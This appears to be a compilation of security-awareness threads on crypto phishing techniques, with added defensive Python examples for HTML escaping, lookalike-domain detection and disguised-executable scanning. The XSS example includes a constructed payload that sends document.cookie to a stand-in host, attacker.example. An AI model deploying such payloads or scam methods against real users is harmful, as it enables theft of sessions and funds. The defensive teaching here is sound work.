Scammers are exploiting a flaw in Twitter's website preview cards: the card shows a legitimate website's preview while the link itself redirects you to a phishing site.
Here's how it's currently being exploited to drain wallets 🧵👇
1/ There is an ongoing exploit that allows people to spoof what the Twitter website preview shows. It can be manipulated to show any website's preview, and take you somewhere completely different.
This is possible in both tweets & DMs.
2/ Recently, using a network of hacked accounts, attackers mass-tweeted claims that Uniswap had been hacked, and they managed to get the hashtags #UniswapHack and #UniswapExploit and the phrase "Revoke Cash" trending.
3/ After clicking on any of the trending terms, you'll find that the top tweets are fake tweets by accounts impersonating well-known web3 security accounts.
They use bots to inflate engagement so those tweets rank at the top of search.
4/ When you click the links, you are redirected to replica phishing sites. After you connect your wallet, the site identifies your most valuable assets and prompts transactions that drain your wallet.
5/ They're taking advantage of the recent SushiSwap exploit, hoping people will see #UniswapHack trending, see what look like top security accounts posting about it with seemingly legitimate links, and visit the websites to 'protect their assets'. All of it is fabricated by scammers.
6/ There have also been other cases of this exploit, where scammers have spoofed website links in DMs during NFT trades, or announced fake airdrops/raffles with legitimate looking links.
7/ Does this link look legit to you? It shows OpenSea's website preview, but will it actually take you there? Test it out for yourself.
8/ Things to learn ✔️
- Don't trust what Twitter previews show.
- Always confirm authenticity. Double check usernames & URLs
- Understand what you're signing
- Hold your valuable assets on a hardware wallet
Stay safe & feel free to share this thread to educate others ❤️
🚨 Analysis of how a scammer stole 14 BAYCs worth over 852 ETH ($1.07 million) today through a month-long social engineering scam.
Here's how it happened 🧵👇
1/ The scammer (@JasonBrubeck) contacted the victim (@_sevenseason_) and asked to license the IP rights for BAYC #2060. They claimed to be a casting director working for "Forte Pictures", an LA-based, Emmy award-winning company with offices at Sony Pictures Studios.
2/ The alias "Jason Brubeck" is fake and does not exist; however, Forte Pictures and Marcus Mizelle are both real and legitimate. The real Forte Pictures did not own the domain forte(.)pictures, but rather operated under Mizelle's own website, marcusmizelle(.)com.
A few days ago, a dangerous Discord XSS exploit was found and actively exploited. It allowed attackers to steal your Discord token after you clicked what looked like an official Discord link.
Here's how it worked 🧵👇
1/ For those who don't know, cross-site scripting (XSS) is an attack in which the attacker injects malicious scripts into a vulnerable website, where they run in the browsers of other users who visit it.
2/ Discord's newly released server discovery page was vulnerable to XSS through HTML injection. Attackers created a server discovery page and placed malicious code in its "Reasons to join" section. This is the HTML code the attackers put on the page.
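To make the "HTML injection" point concrete, here is an added example (not the thread's own code, and not the markup used against Discord, which the thread does not reproduce). It renders a user-supplied "Reasons to join" string two ways: interpolated raw, which lets an injected element and its event handler through, and escaped on output with `html.escape`, which is the fix. The payload and the `attacker.example` URL are constructed placeholders, and `injected_tags` is a helper written for this example that lists any opening tags in the output that the template did not emit.

```python
import html
import re

# Constructed attacker-controlled text for the "Reasons to join" field. It is a
# generic script-injection payload written for this example; the page does not
# reproduce the markup used against Discord, and attacker.example is a placeholder.
REASON = '<img src=x onerror="fetch(`https://attacker.example/c?d=` + document.cookie)">'

# The only element the template itself is supposed to produce.
TEMPLATE_TAGS = {"li"}


def render_unsafe(reason):
    """Interpolates user text straight into markup, so the browser parses the
    injected <img> element and runs its onerror handler."""
    return f'<li class="reason">{reason}</li>'


def render_safe(reason):
    """Escapes <, >, &, " and ' on output, so the browser shows the text
    literally and no injected element or handler is created."""
    return f'<li class="reason">{html.escape(reason, quote=True)}</li>'


def injected_tags(rendered):
    """Names of opening tags in the rendered HTML that the template does not
    emit. Anything listed here came from user input."""
    names = re.findall(r"<\s*([A-Za-z][A-Za-z0-9]*)", rendered)
    return [n.lower() for n in names if n.lower() not in TEMPLATE_TAGS]


if __name__ == "__main__":
    print("unsafe:", render_unsafe(REASON), injected_tags(render_unsafe(REASON)))
    print("safe  :", render_safe(REASON), injected_tags(render_safe(REASON)))
```

Escaping at the point of output is the right control for free-text fields; if a field is meant to allow some formatting, the input should go through a proper allowlist sanitizer rather than a home-grown filter, since a tag-name regex like the one above is only a detection aid, not a defence.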
Scammers have started spoofing URLs using lookalike Unicode letters.
In this case, they replace the letter "i" with a visually similar character that is not the ASCII "i".
The URLs respectively resolve to the following Punycode hostnames:
• xn--premnt-s9a[.]xyz, which decodes to premınt[.]xyz (the "i" is U+0131, LATIN SMALL LETTER DOTLESS I)
• xn--premnt-zva[.]xyz, which decodes to premìnt[.]xyz (the "i" is U+00EC, LATIN SMALL LETTER I WITH GRAVE)
On the phishing website, you are shown a replica of the @PREMINT_NFT site.
When you click "Login To Register", depending on your total NFT collection value and your wallet balance, it either requests a Seaport signature that drains your NFTs or attempts to drain your ETH.
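The check a practitioner wants here is to decode the Punycode and compare what the name looks like against the domain it imitates. The following is an added example, not code from the thread: it decodes `xn--` labels with Python's built-in `punycode` codec, lists every non-ASCII character with its Unicode name, flags labels that mix scripts, and reduces the name to an ASCII "skeleton" (accents stripped via NFKD, plus a small constructed lookalike table) to detect impersonation of a trusted domain. `premint.xyz` as the legitimate domain is an assumption for the example, since the thread only names the @PREMINT_NFT account; the example also handles Cyrillic lookalikes, which go beyond the two accented-"i" cases on the page.

```python
import codecs
import unicodedata

# Assumed legitimate domain of the site being impersonated; the page only names
# the @PREMINT_NFT account, so this value is an assumption for the example.
TRUSTED = ("premint.xyz",)

# Characters that look like ASCII letters but that NFKD does not reduce to them.
# A small constructed table, not the full Unicode confusables list.
CONFUSABLES = {
    "\u0131": "i",  # LATIN SMALL LETTER DOTLESS I
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u0455": "s",  # CYRILLIC SMALL LETTER DZE
    "\u04bb": "h",  # CYRILLIC SMALL LETTER SHHA
}


def decode_label(label):
    """Return the Unicode form of one DNS label (xn-- labels carry Punycode)."""
    if label.lower().startswith("xn--"):
        return codecs.decode(label[4:].encode("ascii"), "punycode")
    return label


def decode_hostname(host):
    return ".".join(decode_label(part) for part in host.split("."))


def skeleton(text):
    """Collapse a string to the ASCII a human would read it as: strip accents
    via NFKD and map known lookalikes onto their ASCII twins."""
    out = []
    for ch in text:
        for part in unicodedata.normalize("NFKD", CONFUSABLES.get(ch, ch)):
            if not unicodedata.combining(part):
                out.append(CONFUSABLES.get(part, part))
    return "".join(out)


def scripts_in(text):
    """Script names (first word of each character's Unicode name) used by the letters."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in text if ch.isalpha()}


def analyse(host, trusted=TRUSTED):
    """Decode a hostname and report the signals that mark a lookalike domain."""
    uni = decode_hostname(host)
    non_ascii = [f"U+{ord(c):04X} {unicodedata.name(c, '?')}" for c in uni if ord(c) > 0x7F]
    labels = uni.split(".")
    return {
        "unicode": uni,
        "non_ascii": non_ascii,
        "mixed_script": any(len(scripts_in(lbl)) > 1 for lbl in labels),
        "impersonates": [t for t in trusted if uni != t and skeleton(uni) == skeleton(t)],
    }


if __name__ == "__main__":
    for h in ("xn--premnt-s9a.xyz", "xn--premnt-zva.xyz", "premint.xyz"):
        print(h, "->", analyse(h))
```

Both of the thread's hostnames produce an empty `mixed_script` result, since a dotless or accented "i" is still Latin; that is why the non-ASCII listing and the skeleton comparison are the checks that actually catch them, and why a mixed-script test alone is not enough.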
Scammers are spoofing file extensions to disguise malicious files as PDFs, targeting artists, influencers, and projects.
This is how it works 🧵👇
1/ In this case, artist @RabbitinM was first messaged about a commission for his art. He was sent a zip file containing what the customer wanted, with examples and sketches. What seemed to be a normal commission turned bad when the artist went to view the customer's request.
2/ After opening the zip file, we can see example art along with the PDF file supposedly containing the customer's sketches. However, this isn't a regular PDF file. It is actually a Screen Saver (.scr) file, which is an ordinary Windows executable under a different extension, disguised as a PDF.
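The practical check is to look at the archive member's real extension and its first bytes rather than at the icon. Below is an added example, not the thread's own code, that scans a zip for the tricks used in this lure: an executable extension such as `.scr` behind a document-looking name, a double extension (`sketches.pdf.scr` displays as `sketches.pdf` once Windows hides known extensions), a run of spaces that pushes the real extension out of view, a right-to-left override character, and content whose magic bytes (`MZ` for a Windows executable, `%PDF-` for a PDF, and so on) do not match what the name claims. The sample archive is constructed in memory; the file names and contents are invented for the example and are not the files from the incident.

```python
import io
import zipfile

# Extensions Windows will execute on double-click, versus ones a user expects
# to open in a viewer. Constructed lists for this example, not exhaustive.
EXEC_EXTS = {".scr", ".exe", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js",
             ".jse", ".wsf", ".hta", ".lnk", ".msi", ".ps1"}
DOC_EXTS = {".pdf", ".png", ".jpg", ".jpeg", ".gif", ".psd", ".txt", ".docx"}

# Leading bytes that identify the real format regardless of the file name.
MAGIC = [
    (b"%PDF-", "pdf"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"MZ", "pe"),  # DOS/PE header: .exe, .dll and .scr all start this way
]
EXT_FOR_KIND = {"pdf": {".pdf"}, "png": {".png"}, "jpeg": {".jpg", ".jpeg"}}


def sniff(head):
    """Classify content by its leading bytes."""
    for sig, kind in MAGIC:
        if head.startswith(sig):
            return kind
    return "unknown"


def inspect_name(name):
    """Findings based on the file name alone."""
    base = name.rsplit("/", 1)[-1]
    parts = [p.strip().lower() for p in base.split(".")]
    exts = ["." + p for p in parts[1:]]
    findings = []
    if exts and exts[-1] in EXEC_EXTS:
        findings.append(f"real extension {exts[-1]} is executable")
    if len(exts) >= 2 and exts[-2] in DOC_EXTS and exts[-1] in EXEC_EXTS:
        findings.append(f"double extension: displays as {exts[-2]} once Windows "
                        f"hides the known {exts[-1]} extension")
    if "  ." in base:
        findings.append("run of spaces pushes the real extension out of view")
    if "\u202e" in base:
        findings.append("RIGHT-TO-LEFT OVERRIDE reverses how the name tail is displayed")
    return findings


def scan_zip(data):
    """Map of archive member -> findings, combining name checks with magic bytes."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            findings = inspect_name(info.filename)
            with zf.open(info) as fh:
                kind = sniff(fh.read(16))
            base = info.filename.rsplit("/", 1)[-1]
            ext = "." + base.rsplit(".", 1)[-1].strip().lower() if "." in base else ""
            if kind == "pe":
                findings.append("content starts with MZ: a Windows executable whatever the icon shows")
            elif kind in EXT_FOR_KIND and ext not in EXT_FOR_KIND[kind]:
                findings.append(f"content is {kind} but the name claims {ext or 'no extension'}")
            if findings:
                results[info.filename] = findings
    return results


def build_sample_zip():
    """Constructed archive mimicking the commission lure: two genuine-looking
    files plus a PE executable named to pass as a PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("commission/reference1.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
        zf.writestr("commission/brief.pdf", b"%PDF-1.7\n% constructed placeholder\n")
        zf.writestr("commission/sketches.pdf" + " " * 40 + ".scr", b"MZ\x90\x00" + b"\x00" * 60)
    return buf.getvalue()


if __name__ == "__main__":
    for member, hits in scan_zip(build_sample_zip()).items():
        print(member.strip())
        for hit in hits:
            print("   -", hit)
```

Magic-byte sniffing is the part that survives renaming: a PE file starts with `MZ` no matter what it is called or which icon its resources declare, so a mail gateway or a cautious recipient can reject executables inside archives without trusting the extension at all.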
Using a flaw in Google Ads, scammers are able to make the real and scam URLs look exactly the same.
Already ~100 ETH stolen 🧵👇
1/ After clicking the top link, you are redirected to one of these phishing sites. On the phishing websites, two types of scams are running.
One tries to get your seed phrase; the other calls a Refund() method and attempts to drain your wallet balance.
2/ How do you prevent this?
- ALWAYS make sure you're on the right URL at all times
- Never confirm random transactions. Always be cautious.
- Never give out your seed phrase.
- Store your valuables on a cold wallet
Already $650,000 stolen from a single individual, and it's going to happen to a lot more people.
This is how it happened 🧵👇
1/ On April 15th, @revive_dom received multiple text messages asking to reset his Apple ID password, and at 6:32 PM he received a call from "Apple Inc." with a spoofed caller ID.
They claimed there was suspicious activity on his Apple ID and asked for a one-time
2/ verification code to prove he was the owner of the Apple ID account. After he gave them the 6-digit verification code, the scammers hung up and his MetaMask wallet was wiped, with over $650,000 stolen. How did they access his MetaMask wallet? Let's look into what happened 👇